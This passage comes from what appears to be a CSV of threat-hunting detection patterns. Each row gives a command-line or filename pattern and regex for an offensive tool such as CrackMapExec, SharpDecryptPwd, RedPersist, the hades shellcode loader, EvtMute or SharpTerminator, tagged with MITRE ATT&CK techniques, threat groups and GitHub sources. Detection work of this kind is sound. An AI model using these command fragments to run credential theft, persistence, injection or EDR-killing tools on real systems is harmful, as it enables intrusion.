Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","4640" "*.exe Whisker -action add -target * -cert-pass *",".{0,1000}\.exe\sWhisker\s\-action\sadd\s\-target\s.{0,1000}\s\-cert\-pass\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4641" "*.exe Whisker -action list -target *",".{0,1000}\.exe\sWhisker\s\-action\slist\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red 
Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4642" "*.exe --winlogon * *:\*.exe*",".{0,1000}\.exe\s\-\-winlogon\s.{0,1000}\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4643" "*.exe --wmi *:\*.exe*",".{0,1000}\.exe\s\-\-wmi\s.{0,1000}\:\\.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4644" "*.exe Xmanager /user:* /sid:* /path:**",".{0,1000}\.exe\sXmanager\s\/user\:.{0,1000}\s\/sid\:.{0,1000}\s\/path\:.{0,1000}.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","4645" "*.exe -Xmangager -p *",".{0,1000}\.exe\s\-Xmangager\s\-p\s.{0,1000}","offensive_tool_keyword","SharpDecryptPwd","Decrypt Navicat,Xmanager,Filezilla,Foxmail,WinSCP,etc","T1003.008 - T1555.004 - T1552.002","TA0006","N/A","N/A","Credential Access","https://github.com/RowTeam/SharpDecryptPwd","1","0","N/A","N/A","10","8","769","117","2022-03-04T02:49:31Z","2022-02-25T11:21:43Z","4646" "*.exe* -d localhost * -u * -p 
*/24*",".{0,1000}\.exe.{0,1000}\s\-d\slocalhost\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4647" "*.exe* -f *.bin -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-f\s.{0,1000}\.bin\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4648" "*.exe* --Filter *rule disable { condition: true }*",".{0,1000}\.exe.{0,1000}\s\-\-Filter\s.{0,1000}rule\sdisable\s\{\scondition\:\strue\s\}.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","N/A","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","4649" "*.exe* -path * -newTimestamp * -username * -password 
*",".{0,1000}\.exe.{0,1000}\s\-path\s.{0,1000}\s\-newTimestamp\s.{0,1000}\s\-username\s.{0,1000}\s\-password\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","4650" "*.exe* -t queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-t\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4651" "*.exe* -t remotethread*",".{0,1000}\.exe.{0,1000}\s\-t\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4652" "*.exe* -t selfthread*",".{0,1000}\.exe.{0,1000}\s\-t\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4653" "*.exe* --technique queueuserapc*",".{0,1000}\.exe.{0,1000}\s\-\-technique\squeueuserapc.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation 
tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4654" "*.exe* --technique remotethread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sremotethread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4655" "*.exe* --technique selfthread*",".{0,1000}\.exe.{0,1000}\s\-\-technique\sselfthread.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","0","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","4656" "*.exe* -u administrator -H :*--shares*",".{0,1000}\.exe.{0,1000}\s\-u\sadministrator\s\-H\s\:.{0,1000}\-\-shares.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","4657" "*.exe*\Terminator.sys*",".{0,1000}\.exe.{0,1000}\\Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/mertdas/SharpTerminator","1","0","N/A","N/A","10","4","341","66","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z","4658" "*.exe._obf.exe*",".{0,1000}\.exe\._obf\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","4659" "*.Execution.Injection.Exe*",".{0,1000}\.Execution\.Injection\.Exe.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - 
TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4661" "*.feeds.123456.*",".{0,1000}\.feeds\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4662" 
"*.files.123456.*",".{0,1000}\.files\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4663" "*.forums.123456.*",".{0,1000}\.forums\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based 
detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4664" "*.ftp.123456.*",".{0,1000}\.ftp\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4666" "*.get_c2profile*",".{0,1000}\.get_c2profile.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","4667" "*.ghostsocks.json*",".{0,1000}\.ghostsocks\.json.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 
- TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","4668" "*.go.123456.*",".{0,1000}\.go\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4669" 
"*.groups.123456.*",".{0,1000}\.groups\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4671" "*.help.123456.*",".{0,1000}\.help\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4672" "*.herominers.com*",".{0,1000}\.herominers\.com.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","1","N/A","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","4673" "*.HTA loader with .HTML extension for specific command*",".{0,1000}\.HTA\sloader\swith\s\.HTML\sextension\sfor\sspecific\scommand.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","4674" "*.imap.123456.*",".{0,1000}\.imap\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4675" "*.img.123456.*",".{0,1000}\.img\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4676" "*.jpeg.jasmin*",".{0,1000}\.jpeg\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 